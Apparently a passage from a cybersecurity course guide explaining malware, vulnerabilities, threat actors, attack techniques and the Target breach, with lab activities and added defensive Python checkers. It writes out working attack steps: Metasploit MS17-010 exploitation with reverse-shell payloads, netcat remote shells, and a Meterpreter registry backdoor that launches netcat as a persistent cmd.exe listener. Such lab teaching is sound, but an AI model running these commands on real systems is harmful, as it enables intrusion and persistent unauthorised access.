To date there have been no fatalities from cyber-crime. But that could just be a temporary state. Early on in computing cyber-crime was virtually unheard of; then in the early 1990s cyber-crime began to increase, but it was not such a serious state of affairs. Attacks were often humorous or lacked any serious effect other than annoyance. Today the stakes have been raised. There is serious money to be made via cyber-crime and so there has been a rapid increase in attacks. More recently we have seen nation-state attacks and serious attacks on infrastructure that could have resulted in deaths.

Activity – Visit Cyber Security Intelligence.com and review attacks with potential
deaths

https://www.cybersecurityintelligence.com/blog/deaths-from-cyber-attacks--3448.html

Visit Sydney Morning Herald and review potential deaths from cyber attacks

https://www.smh.com.au/technology/death-by-hacking-is-no-longer-a-far-fetched-idea-20180209-p4yzte.html

3.1 Security vulnerabilities and malware are identified and demonstrated

Security vulnerabilities and malware

Malware
Malware is an abbreviated term for ‘malicious software’. Malware is software designed to interact maliciously with a computer system. Malicious intent includes disrupting services, damaging computer systems and associated equipment, damaging reputations, extracting confidential information, deleting or modifying data, and holding data to ransom.

Vulnerability
A vulnerability is a weakness or flaw that can be exploited with an attack. In computing, vulnerabilities exist in operating systems, firmware, and application software. Within an operating system, vulnerabilities exist in the individual services such as DHCP, DNS, Web and FTP services, as well as within the underlying structure of the system such as the file permission system and login processes. Aside from computing, vulnerabilities are also found at the human level and include procedures, human behaviour, and physical access points.

Common vulnerabilities include the following:

• Missing data encryption
• OS command injection
• SQL injection
• Buffer overflow
• Missing authentication for a critical function
• Missing authorisation
• Unrestricted upload of dangerous file types
• Reliance on untrusted inputs in a security decision
• Cross-site scripting and cross-site request forgery
• Download of source code without integrity checks
• Use of broken encryption algorithms
• URL redirection to untrusted sites
• Path traversal
• Bugs
• Weak passwords
• Software that is infected with a virus

Activity – Visit OWASP and define the following vulnerabilities: OS command injection; SQL injection; buffer overflow; cross-site scripting; cross-site request forgery; path traversal.
https://www.owasp.org

Common Weakness Enumeration (CWE)


“CWE is a community-developed formal list of common software weaknesses. It serves as a common
language for describing software security weaknesses, a standard measuring stick for software
security tools targeting these vulnerabilities, and as a baseline standard for weakness identification,
mitigation, and prevention efforts.” (CWE, 2019)

Activity

Visit CWE and review: https://mitre.org

Visit CVE and review the top 50 vulnerable products: https://www.cvedetails.com/top-50-products.php

Sources of malware
Trojans, viruses, and other malware can be found on the Internet for research purposes. This is done solely at a user’s discretion, bearing in mind the risk of doing so. Downloads should be done in a virtual machine, and once downloaded, the machine should be air-gapped.
https://zeltser.com/malware-sample-sources/
https://zeltser.com/malicious-ip-blocklists/

Metasploit
Metasploit is a framework developed by Rapid7 for testing vulnerabilities. It is available for Windows and Linux. Using Metasploit, one can send exploits to a remote device and follow up with a payload. An exploit is a module provided by Metasploit that carries out a sequence of commands to take advantage of a vulnerability. Examples of exploits include code injection, buffer overflow and web application exploits. A payload is the shell code that is able to run on a target system after successful exploitation and that enables activity such as adding users, remote desktop access and executing programs.

The basic steps for exploiting a system using the Framework are as follows:
• identify a target
• choose an exploit
• select a payload
• launch the exploit
• deliver the payload

A more detailed description of the process is:

1. Choosing and configuring an exploit (code that enters a target system by taking advantage of
one of its bugs; about 2000 different exploits for Windows, Unix/Linux and Mac OS X
systems are included)
2. Checking whether the intended target system is susceptible to the chosen exploit
3. Choosing and configuring a payload
4. Choosing the encoding technique to encode the payload so that the intrusion-prevention
system (IPS) will not catch the encoded payload
5. Executing the exploit
6. Delivering the payload

msfconsole
msfconsole is a menu-based command-line tool that drives the Metasploit framework. To install or update Metasploit on Kali run apt-get install metasploit-framework

Using msfconsole you could run random exploits, but a more efficient method is to match up vulnerabilities found using a vulnerability scanner such as Nessus to the exploits available in Metasploit. For example, after looking into the details of the Nessus scan report you would identify any missing patches and Common Vulnerabilities and Exposures (CVE) entries. You would then use Metasploit’s search function to search for corresponding exploits. Nmap can also scan for vulnerabilities. The example below shows the syntax for conducting an Nmap scan for a specific vulnerability.

nmap --script smb-vuln-ms17-010 -v <target_ip>

smb-vuln-ms17-010 refers to a ‘remote code execution’ vulnerability known as EternalRomance. If the vulnerability is present, as it is on various unpatched Windows operating systems, then Metasploit can exploit it.

Activity

Visit Microsoft and review EternalRomance

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Within Metasploit, exploit modules can be searched for via platform, name, and other identifiers

• msf5 > search platform:Windows
• msf5 > search type:exploit
• msf5 > search author:hd
• msf5 > search app:client
• msf5 > search name:ms08-067

Sending the exploit

Having found an exploit you now need to tell MSF to use the exploit, show the payloads for the exploit, set the payload to be used, view and set any additional options such as the IP address of the target, and finally run the exploit.

Example:
msf > search eternalromance                          #search to see if the exploit is available in Metasploit
msf > use exploit/windows/smb/ms17_010_psexec        #prepare to use the exploit
msf > show payloads                                  #show which payloads are available
msf > set payload windows/x64/shell_reverse_tcp      #set the payload to use
msf > show options                                   #see which options are available for the payload
msf > set RHOSTS 172.168.45.130                      #set target IP address
msf > set LHOST 172.168.45.135                       #set attacker IP address
msf > run

Metasploit payloads
Some of the common payload names used by msf are as follows:

• windows/adduser
Create a new user in the local administrator group on the target machine
• windows/exec
Execute a Windows binary (.exe) on the target machine
• windows/shell_bind_tcp
Open a command shell on the target machine and wait for a connection
• windows/shell_reverse_tcp
Target machine connects back to the attacker and opens a command shell (on the target)
• windows/meterpreter/bind_tcp
Target machine installs the Meterpreter and waits for a connection
• windows/meterpreter/reverse_tcp
Installs Meterpreter on the target machine then creates a connection back to the attacker
• windows/vncinject/bind_tcp
Installs VNC on the target machine and waits for a connection
• windows/vncinject/reverse_tcp
Installs VNC on the target machine and sends the VNC connection back to the attacker

Note the difference here between bind and reverse. Binding sends the exploit and makes the
connection, whilst reverse sends the exploit but waits for the target to make the connection.

The Meterpreter is a program that can be installed on a compromised system, and provides access to
its features such as uploading and executing files as well as killing processes.

https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/ (accessed 29 May 2020)

Activity

Visit Offensive Security and review how to use metasploit

https://www.offensive-security.com/metasploit-unleashed/

Activity

Use Metasploit to run an exploit on a system. Use the CVE database or the listing at Rapid7 to find an exploit for a vulnerability on your virtual system. Note that the MS17-010 EternalRomance vulnerability can be exploited if Server 2016 has not been updated since 2017.

https://www.rapid7.com/db/

Run the nmap scanner from Kali against Server 2016 to determine if the system is vulnerable.

nmap --script smb-vuln-ms17-010 -v <target_ip>

Run Metasploit from Kali against Server 2016 as follows:

msf > search eternalromance                               #search to see if the exploit is available in Metasploit
msf > use exploit/windows/smb/ms17_010_psexec             #prepare to use the exploit
msf > show payloads                                       #show which payloads are available
msf > set payload windows/x64/meterpreter/reverse_tcp     #set the payload to use
msf > show options                                        #see which options are available for the payload
msf > set RHOSTS 172.168.45.130                           #set target IP address
msf > set LHOST 172.168.45.135                            #set attacker IP address
msf > run

* Ensure the correct port is being used by Metasploit (445)

3.2 Threat actors, threat vectors and threat goals are defined

Threat actors, threat vectors and threat goals

Threat actors are the entities that carry out cyber-crime. Threat actors can be classified as:

• Hacktivist (motivated by political and social causes rather than financial gain)
• Nation state (backed by governments)
• Internal to an organisation (intentional and unintentional offenders)
• External to an organisation
• Individual
• Groups
• Cyber criminal

Activity

Visit US Cybersecurity and review various famous hacktivist groups

https://www.uscybersecurity.net/infamous-hacking-groups/

Visit Tech Target and review further details about hacktivist group ‘Anonymous’

https://whatis.techtarget.com/definition/Anonymous

Visit BAE Systems and review ‘The nation state actor’

https://www.baesystems.com/en/cybersecurity/feature/the-nation-state-actor

Visit New Statesman and review “Microsoft reveals scale of nation-state attacks”

https://tech.newstatesman.com/security/microsoft-customers-nation-state-hackers

3.3 Techniques used by attackers to infiltrate a system are described and demonstrated

Techniques to infiltrate a system

There are many techniques used to infiltrate a system, including the following.

Keylogging
Keyloggers may be software or hardware. One example of a hardware keylogger is a USB dongle that can be inserted into a machine and will record all key events to its internal memory. Another hardware keylogger example is a sniffer that intercepts traffic from a wireless keyboard. One advantage of a hardware keylogger is that it logs data from the moment a PC is turned on, and so it can record login credentials.

Software keyloggers become resident in memory sometime during the boot-up process and so they may miss the initial login event. Software keyloggers record data to a log file. They can be installed manually on a machine or installed as part of a virus. Once installed, a keylogger’s log file can be uploaded to a website, periodically emailed, or wirelessly transmitted.

Activity - Download a free software keylogger and capture keyboard events

http://perfectgeeks.com/free-keylogger-software/

Cookie stealer
A cookie is a data file that a website sends to your machine. It contains information that the website can use to recognise a user when they visit again, and thereby tailor web page content specifically to that user. What is stored in a cookie depends on the web site being visited and may include login credentials and credit card details. Credentials are probably hashed, so your password cannot be revealed, but a hacker can use your cookie to log in. An attacker can access a user’s cookies via WiFi or cross-site scripting methods.
https://www.acunetix.com/websitesecurity/cross-site-scripting/

Bait and switch

In the bait and switch technique a user clicks on a download link for some wanted software, but the link downloads malicious software. The link is commonly at a software download site such as sourceforge.net, or is embedded in advertising links at high-profile sites such as yahoo.com that sell advertising space to third parties.

Eavesdropping
Eavesdropping commonly occurs on wireless networks, as opposed to wired networks, because wireless transmissions can be easily intercepted. A rogue access point can be set up at free WiFi centres and act as a man-in-the-middle, where transmissions are intercepted and stored and then passed on to the Internet. The stored information can then be read by an attacker.

Phishing
In one form of phishing an attacker sets up a replica site for, say, mybank.com. The replica site’s domain name might be very similar to the actual domain name, for example mybank1.com. A hyperlink to the site along with some relevant content is then emailed to a target. If the target is not wary, they may click on the link, not recognise the difference in domain names, and use their login credentials to log in to the fake site. The attacker then has the target’s login credentials for the actual site.
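The look-alike domain trick described above can be caught before a link is clicked. The following is an added example written for this guide, not part of the original material: it compares the host in a link against domains the reader trusts (mybank.com, as in the text) and flags hosts that are a couple of edits away, that swap look-alike digits for letters, or that bury the trusted name inside a longer attacker-controlled name. The TRUSTED set, the confusable-character table and the sample links are constructed.

```python
"""Flag look-alike domains in links before they are clicked.

Added example for this guide (not part of the original material). It checks
the host of a hyperlink against a small set of domains the reader trusts,
as a mail filter or a careful user would. TRUSTED and the sample URLs are
constructed; mybank.com is the example domain used in the text.
"""
from urllib.parse import urlparse

TRUSTED = {"mybank.com"}

# Digits attackers substitute for the letters they resemble (constructed, partial list).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def levenshtein(a, b):
    """Edit distance: how many single-character edits turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def hostname(url):
    """Lower-cased host of a URL, without any trailing dot."""
    return (urlparse(url).hostname or "").lower().rstrip(".")


def classify(url, trusted=TRUSTED):
    """Return 'trusted', 'lookalike:<domain>', 'suspicious-userinfo', 'unknown' or 'no-host'."""
    parsed = urlparse(url)
    if "@" in parsed.netloc:
        # https://mybank.com@evil.example/ : the text before @ is a username, not the host
        return "suspicious-userinfo"
    host = hostname(url)
    if not host:
        return "no-host"
    for legit in trusted:
        if host == legit or host.endswith("." + legit):
            return "trusted"                        # the domain itself or a real subdomain
    for legit in trusted:
        if legit in host:                           # mybank.com.evil.example
            return f"lookalike:{legit}"
        folded = host.translate(CONFUSABLES)        # myb4nk.c0m -> mybank.com
        if levenshtein(folded, legit) <= 2:         # mybank1.com, mybank.co, rnybank.com
            return f"lookalike:{legit}"
    return "unknown"
```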

Clickjacking
Clickjacking is a method of tricking a user into clicking on a malicious webpage element. The element is transparent and placed over the top of a non-malicious element such as a login button or any other legitimate element. So, the user believes they are clicking on a wanted element, but they actually click on the hidden link, which may redirect them to a malicious site.
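Both cookie stealing (previous section) and clickjacking are limited by response headers that the site itself controls. The following is an added example, not code from the guide: it audits a raw HTTP response for Set-Cookie values missing Secure (readable by a WiFi eavesdropper), HttpOnly (readable by injected script) or SameSite, and for the absence of X-Frame-Options and a Content-Security-Policy frame-ancestors directive, which together stop a page being framed. The WEAK and HARDENED responses are constructed.

```python
"""Audit an HTTP response for cookie-theft and clickjacking exposure.

Added example for this guide, not code from it. parse_headers reads a raw
response; audit_response reports cookies that lack Secure, HttpOnly or
SameSite, and pages that can be framed because neither X-Frame-Options nor
a CSP frame-ancestors directive is set. WEAK and HARDENED are constructed.
"""


def parse_headers(raw):
    """Return [(name, value)] from a raw response; header names lower-cased."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:                  # lines[0] is the status line
        if not line.strip():
            break                           # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_cookie(set_cookie):
    """Return (cookie name, [missing attributes]) for one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    wanted = (("Secure", "secure"),       # without it the cookie travels over plain HTTP
              ("HttpOnly", "httponly"),   # without it document.cookie exposes it to XSS
              ("SameSite", "samesite"))   # without it cross-site requests carry it
    missing = [flag for flag, key in wanted if key not in attrs]
    return name, missing


def audit_response(raw):
    """List the findings for one response; an empty list means both checks pass."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cookie, missing = audit_cookie(value)
            if missing:
                findings.append(f"cookie {cookie} missing {', '.join(missing)}")
    names = {n for n, _ in headers}
    csp = " ".join(v.lower() for n, v in headers if n == "content-security-policy")
    if "x-frame-options" not in names and "frame-ancestors" not in csp:
        findings.append("page can be framed: no X-Frame-Options or CSP frame-ancestors")
    return findings


# Constructed responses: a session cookie set the weak way, and the hardened equivalent.
WEAK = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123; Path=/
"""

HARDENED = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
Content-Security-Policy: frame-ancestors 'none'
X-Frame-Options: DENY
"""
```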

Fuzzing
Fuzzing is a technique used to find software vulnerabilities. Automated tools are used to provide random and/or invalid data to an input such as a form field, and then the output is monitored for program failings such as buffer overflows and system crashes. Examples of fuzzing input include different combinations of alphanumeric characters and symbols, particularly those known to cause issues, such as very large numbers, zero, binary strings and characters specific to a vulnerability such as ‘ and = for SQL injection. Examples of items that can be fuzzed include form fields and wireless access points. Essentially, fuzzing finds bugs by injecting malformed data into a program or service.
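A minimal fuzz harness that exercises the inputs the paragraph lists (zero, very large numbers, binary strings, SQL metacharacters) against a deliberately fragile record parser, then against a hardened version of the same parser. This is an added example written for this guide; parse_record, its 'name=<text>;age=<int>' format and the test inputs are constructed, not a real product.

```python
"""Fuzz a small record parser the way the paragraph describes.

Added example for this guide, not code from it. parse_record is a
deliberately fragile, constructed parser; parse_record_safe is the hardened
version; fuzz_cases builds the boundary inputs the text lists plus seeded
random junk; fuzz records which exception each input provokes.
"""
import random
import string


def parse_record(raw):
    """Naive target: trusts the field count, the '=' and the value of age."""
    name_field, age_field = raw.split(";")          # wrong field count -> ValueError
    age = int(age_field.split("=")[1])               # 'age' without '=' -> IndexError; junk -> ValueError
    return {"name": name_field.split("=")[1],
            "years_left": 100 // age}                # age=0 -> ZeroDivisionError


def parse_record_safe(raw, max_len=256):
    """Hardened target: bounds the length, validates every field, never raises on bad input."""
    if not isinstance(raw, str) or len(raw) > max_len:
        return None
    fields = dict(p.split("=", 1) for p in raw.split(";") if "=" in p)
    age_text = fields.get("age", "")
    # isdecimal() rejects '', '-1', "' OR 1=1"; the length check rejects 400-digit numbers
    if not age_text.isdecimal() or len(age_text) > 3:
        return None
    age = int(age_text)
    if age == 0 or age > 150:
        return None                                  # rejects the divide-by-zero case
    return {"name": fields.get("name", ""), "years_left": 100 // age}


def fuzz_cases(seed=1, n=200):
    """Hand-picked boundary inputs from the text, then seeded random strings."""
    rng = random.Random(seed)
    cases = ["", ";", "name=bob", "name=bob;age", "name=bob;age=0",
             "name=bob;age=" + "9" * 400,            # very large number
             "name=bob;age=-1",                      # negative
             "name=bob;age=' OR 1=1",                # SQL metacharacters
             "\x00\xff\x01;=",                       # binary string
             "name=;age=", "name=a;age=1;extra=2"]
    alphabet = string.ascii_letters + string.digits + ";='\"\\\x00 "
    for _ in range(n):
        cases.append("".join(rng.choice(alphabet) for _ in range(rng.randint(0, 40))))
    return cases


def fuzz(target, cases):
    """Run target over every case; map each exception type to the first input that raised it."""
    crashes = {}
    for case in cases:
        try:
            target(case)
        except Exception as exc:                    # a real harness would also watch for hangs
            crashes.setdefault(type(exc).__name__, case)
    return crashes
```

Running `fuzz(parse_record, fuzz_cases())` surfaces three distinct failure classes from the fragile parser, while the hardened parser returns None for every bad input and raises nothing.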

Advanced Persistent Threat (APT)
APTs are stealthy attacks that gain unauthorised entry to a system and then remain undetected,
moving about installing malware and opening back doors.

Back door
A backdoor is a means into a computer system. A backdoor may be created by a software developer as an administrative method to troubleshoot issues remotely. However, that backdoor may be used for malicious purposes if a hacker can locate it. Alternatively, a hacker may exploit a system such that the system can be opened whenever they like, for, say, loading malicious software.

Using Netcat and Meterpreter to open a backdoor

Netcat is a tool that allows communication and network traffic to flow from one machine to another. Netcat can transfer files, conduct port scans and act as a simple chat program. Netcat can connect from any port on your local machine to any port on the target machine. Netcat has a client and a server mode. Whilst in server mode netcat waits and listens for incoming connections.

Activity – Use NetCat in chat mode.

nc -l -p 2323

In the command above, “nc” is used to invoke the Netcat program, whereas the “-l” is
used to put Netcat into a listener mode. The “-p” is used to specify the port number we
want Netcat to listen on. At this point Netcat is running and waiting to accept an
incoming connection on port 2323.

nc 172.16.45.132 2323

Running this command from the second PC will force Netcat to attempt a connection to
port 2323 on the machine with an IP address of 172.16.45.132. The two PCs should now
be able to communicate. You can test this by typing text into either terminal window.

To end the “chat” and close the session, we can issue the Ctrl+C key combination. This will however close the Netcat server also. In order to leave a backdoor open, the Netcat server can be run in persistent mode such that it will always listen for a connection request.

Use -L for a persistent connection.

However, the ‘-L’ option will not survive a reboot. You would need to modify the Windows registry to make Netcat truly persistent.

Activity – Use NetCat to transfer files.

Chat is nice, but transferring files or setting up a remote shell is more likely to be a hacker’s intention. To transfer files:

• nc -l -p 2323 > [filename.exe]
• Any input received will be stored in filename.exe.
• nc 172.16.45.129 2323 < [filename.exe]

Note that Netcat does not provide feedback regarding success or failure.

Activity – Use NetCat to open a remote shell.

Netcat can be used to provide a remote shell such as the MS Windows command interpreter, cmd.exe.

• nc -L -p 2323 -e c:\windows\System32\cmd.exe
• The attacking machine can now connect and use the remote shell.
• nc <target_ip_address> 2323

Using Meterpreter to set up a permanent backdoor using NetCat

Setting up a remote shell, as shown previously, can be done remotely using Metasploit’s Meterpreter program. Meterpreter can also be used to modify the registry of the remote machine so that the remote shell (backdoor) opens whenever the machine is booted.

The process is as follows:

• Use Meterpreter to upload NetCat (nc.exe) to the C:\windows\system folder
• Use Meterpreter to set the registry values so that NetCat will start whenever the system starts
• Use Meterpreter to start the command shell on the remote machine
• Use the command shell to run ‘netsh’ to open a firewall port, say 445
• Use NetCat on the local machine to open the remote command shell
• Use whichever commands are provided by the remote shell

Activity – Use Meterpreter and NetCat to set up a permanent remote shell

https://www.offensive-security.com/metasploit-unleashed/persistent-netcat-backdoor/

1. meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
2. meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
3. meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
4. meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
5. execute -f cmd -i
6. netsh firewall show opmode
7. netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
8. netsh firewall show portopening
9. nc -v 172.16.104.128 445
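A defender looking for the persistence written in step 3 would inspect the same Run key. The following is an added example, not from the guide or from Metasploit Unleashed: it parses a reg query style dump of the HKLM CurrentVersion Run key and flags values that start a network tool such as nc.exe, listen for inbound connections, or hand the connection to cmd.exe. RUN_KEY_DUMP, the REMOTE_SHELL_TOOLS watch list and the SHELLS set are constructed; only the 'nc' entry in the dump mirrors the value the steps above write.

```python
"""Detect a Run-key backdoor like the one installed in the steps above.

Added example for this guide, not from it or from Metasploit Unleashed. It
parses a reg query style dump of the CurrentVersion Run key and flags any
value whose command line starts a network tool such as nc.exe, listens for
inbound connections, or hands the connection to cmd.exe. RUN_KEY_DUMP is
constructed; only its 'nc' entry mirrors the value the walkthrough writes.
"""
import re

RUN_KEY_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\student\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

ENTRY_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.+?)\s*$")
REMOTE_SHELL_TOOLS = {"nc.exe", "nc64.exe", "ncat.exe"}      # constructed watch list
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell"}
LISTEN_FLAG_RE = re.compile(r"-[a-zA-Z]*[lL][a-zA-Z]*")       # -l, -L, -Ldp, -lvp ...


def parse_run_key(dump):
    """Return (value name, type, command line) for each value line in the dump."""
    entries = []
    for line in dump.splitlines():
        m = ENTRY_RE.match(line)                 # the key-path line has no REG_ type and is skipped
        if m:
            entries.append((m.group(1), m.group(2), m.group(3)))
    return entries


def split_cmdline(cmd):
    """Tokenise a Windows command line, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def indicators(cmdline):
    """Reasons one Run-key command line looks like a backdoor listener (empty if none)."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return []
    exe = tokens[0].rsplit("\\", 1)[-1].lower()   # basename of the program being started
    reasons = []
    if exe in REMOTE_SHELL_TOOLS:
        reasons.append(f"starts network tool {exe}")
    for i, tok in enumerate(tokens[1:], 1):
        if exe in REMOTE_SHELL_TOOLS and LISTEN_FLAG_RE.fullmatch(tok):
            reasons.append("listens for inbound connections")
        # -e / -c make the tool run a program for whoever connects
        if tok.lower() in ("-e", "-c") and i + 1 < len(tokens) and tokens[i + 1].lower() in SHELLS:
            reasons.append(f"executes {tokens[i + 1]} on connect")
    return reasons


def audit_run_key(dump):
    """Map each suspicious value name to its list of indicators."""
    findings = {}
    for name, _type, cmdline in parse_run_key(dump):
        reasons = indicators(cmdline)
        if reasons:
            findings[name] = reasons
    return findings
```

On a live host the same logic applies to the output of reg query for the HKLM and HKCU Run and RunOnce keys, and the value name chosen by an attacker need not be as obvious as 'nc'.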

3.4 Characteristics and operation of a cyber-attack are explained

Characteristics of a cyber-attack
A cyber-attack can be categorised in various ways as follows.

Actors
• Hacktivists
• Nation state
• Internal to an organisation
• External to an organisation
• Individual
• Groups
• Cyber criminal

Motivation
• Financial
• Revenge
• Notoriety
• Fun
• Control
• Terrorism
• Espionage

Target
• Individuals in the general public, businesses, government organisations, countries
Most common targets are:
  o Small business – because they are not secure
  o Healthcare – because of the mass of confidential information
  o Law firms – because of the nature of the information available, e.g. it can be used to create fake IDs from personal information and to manipulate the stock market
    https://www.darkreading.com/attacks-breaches/hackers-face-$89-million-fine-for-law-firm-breaches/d/d-id/1328840 (accessed 29 May 2020)
  o PCs and phones – used for cryptojacking
  o Financial institutions – because of the money
• End-point devices such as PCs, servers, and printers
• Intermediary devices such as routers and switches

Activity – Visit Tech Jury and review cyber-crime statistics.

https://techjury.net/stats-about/cybercrime

Attack surface
A target’s attack surface is the number of vulnerable points it has; points where the system can be
compromised. Vulnerabilities include unpatched software, software development bugs, social
engineering access points, installed but unused services, open ports that are not used and insecure
use of administrative privileges. The more vulnerabilities a target has, the larger its attack surface. A
target in this regard can be an individual device, a network, or an organisation.

Effect on target
Depending on how a target is defined, effects on the target include system shutdown, poor
performance, exposure of confidential information, business closure, loss of reputation and financial
loss.

Duration
The duration of a cyber-attack is variable depending on the type of attack, intended consequences
and a victim’s ability to respond. This could be from fractions of a second through to days, weeks,
and months.

 DDoS attacks for example may last up to 24 hours, or as long as it takes to get a solution in
place.
 The encrypting period of a ransomware attack depends on the number of files encrypted
and the processing power of the computer. A few hours perhaps. The ongoing exchange of
funds and potential unencrypting of data may take 24 – 48 hours.
 Malware installations vary depending on the size of the malware and subsequent action. For
example, installing the malware may take seconds to minutes and the subsequent extraction
of data from the target may take hours to days depending on the process used (intermittent or
permanent).
 A virus or worm may only take seconds or less to do its work.
 SQL injection attacks take as long as needed to find a vulnerable site and to then test
injected code until a vulnerability is found. This could be hours to weeks.
 An Advanced Persistent Threat may exist for days, weeks or months before it is discovered.
Or it may never be discovered at all.

Attack vector
The attack vector is the method an attacker uses against a vulnerability in order to deliver the
payload, or the method by which a malicious event occurs, or the path through which an attack
occurs, or the vehicle through which the exploit occurs. Examples of attack vectors include social
engineering, email, websites, and exploit applications such as Metasploit. The most common attack
vectors are email and social engineering.

Vulnerability
A vulnerability is a weakness in a system. It is the point that is attacked. Vulnerabilities include
unpatched software, software development bugs, social engineering access points, installed but
unused services, open ports that are not used and insecure use of administrative privileges.

Malicious software
Malicious software is software that purposefully creates an unwanted effect upon a target. Examples
of malicious software include:

 viruses, worms, and Trojans
 ransomware – encrypts data and demands financial payment for decrypting that data
 spyware – logs activity and/or relays information to a remote device
 adware – unwanted advertisements
 rootkits

The term ‘Rootkit’ is a derivative of root level access and a kit of tools. Rootkits are programs that
can hide files, programs, processes, and entry/exit points from users and from the operating system.
Depending on the variety of rootkit used, they can also record keystrokes, set up backdoor programs,
falsely report free disk space, hide registry keys and carry out other mischievous tasks. Rootkits also
hide themselves.

When executed, rootkits reach deep within a system and can intercept operating system and other
software requests. For example, when a user presses CTRL-ALT-DEL to bring up Task Manager, a
rootkit can intercept the request and remove its processes from Task Manager, and thus appear
invisible. Alternatively, a rootkit could just totally prevent Task Manager from being viewable.

Rootkits can be classified by how deeply they infect a system, whether that be at the application,
firmware, kernel or virtualised level. Rootkits may not be detected by anti-virus software and so
specialised discovery and removal tools are available.

Some examples of rootkits include:

TDSS
TDSS is a very widespread rootkit that also goes by the names Rootkit.Win32.TDSS,
Tidserv, TDSServ, and Alureon. TDSS monitors a system's network traffic, searching it for
usernames, passwords and credit card data.

ZeroAccess
ZeroAccess, also known as max++ and Sirefef, is a trojan horse used to download other
malware on an infected machine and to form a botnet mostly involved in Bitcoin mining and
click fraud, while remaining hidden on a system using rootkit techniques.

Activity – Visit Bleeping Computer and review rootkit varieties.

https://www.bleepingcomputer.com/startups/rootkits

Then visit Heimdal Security and review types of rootkits and rootkit detection/removal
tools.

https://heimdalesecurity.com/en/

Operation of a cyber attack


The operation of a cyber-attack can vary from simple social engineering to gain credentials and then
subsequent system access via those credentials, through to multi-step processes such as that used in
the Target data theft attack where 40 million credit and debit card numbers were stolen from the
retailer.

Target attack
1. Installed malware through email phishing to steal the credentials of a third-party service
provider to Target, a HVAC vendor.
2. Stolen credentials were used to gain access to a web application hosted on Target's internal
network.
3. A PHP script file was uploaded to the web application, opening up a web shell backdoor that
allowed uploading of files and executing operating system commands.
4. Using operating system commands, the names of members of the domain were obtained.
This includes users, computers and services. The purpose of the located computers was
determined from their names (e.g. MSSQLvc/billingServer). The DNS server was then queried
to obtain the IP addresses of those names (used later).
5. Administrative privileges were gained by a technique known as “pass-the-hash”, which
allows impersonation of an administrator by using their password hash directly without knowing their
password.
6. A new domain account was created using the administrative privileges, so that the attackers
could hide in plain sight.
7. ‘Angry IP scanner’ was used to detect computers that were accessible on the network from
the current computer, and then a port forwarding IT tool was used to tunnel through a
series of servers to bypass security measures. Remote execution on the targeted servers
occurred by using Microsoft PsExec (like Telnet) and a Remote Desktop Client. Microsoft
Orchestrator was then used to maintain access for remote execution of code.
8. SQL query tools were used to retrieve database contents. However, Payment Card Industry
standards meant that there was no retrievable data, and so the attackers moved the target to
the Point of Sale system.
9. Using the information gained at step four and the remote execution ability from step seven,
malware named Kaptoxa was installed on the Point of Sale machines and retrieved credit card
numbers stored in memory.
10. The credit card numbers were copied to an internal FTP machine using the administrator
credentials.
11. A script was used to transfer the credit card numbers from the internal FTP machine to the
attackers' external FTP machine.
https://www.cio.com/article/2600345/11-steps-attackers-took-to-crack-target.html
(accessed 29 May 2020)

3.5 Trends of cyber threats are investigated

Cyber threat trends


Trends in cyber-crime follow what is easy to do, what is commonly available and what reaps the
most reward. And so, the cyber threat landscape changes as technology, and its uptake, changes.

Activity – Visit Scam Watch and review trends in cyber-crime.

https://www.scamwatch.gov.au/about-scamwatch/scam-statistics

Phishing
Phishing is one of the most common and successful exploits and, with the sale of phishing kits on the
Dark Web, it is set to increase. A phishing kit is a set of tools that enables someone to start and
manage an ongoing phishing campaign. The kits are simple, and so even those with little knowledge
can use them. A phishing kit includes web development software complete with graphics and fonts
to mimic a legitimate site such as Microsoft or Yahoo. The kit also includes an email spam system to
automate mailing and sometimes a list of legitimate email addresses, though email lists may be sold
separately as spam kits.

Remote access and IoT
Remote attacks are becoming more common because of the increase in Internet of Things (IoT)
devices. Traditionally remote attacks centred on routers, servers, workstations, and Network
Attached Storage devices. Devices like these are often well secured and so attacks are often not
successful. However, with the advent of IoT there is a whole new range of end point devices such as
cameras, thermostats, and door locks. In addition to their population increase, IoT devices are often
not well secured, having default login credentials and vulnerable protocols.

Smartphones
Smartphones are the most common device attacked. This is likely because a smartphone is more
accessible than other devices and because a smartphone includes email access. Attacks on
smartphones come via connecting to untrusted Wi-Fi networks, unpatched operating systems
(particularly Android), and social engineering attacks. Two-factor authentication is also a factor in
smartphone usage for cyber-crime, as having access to a target's phone makes login credentials easier
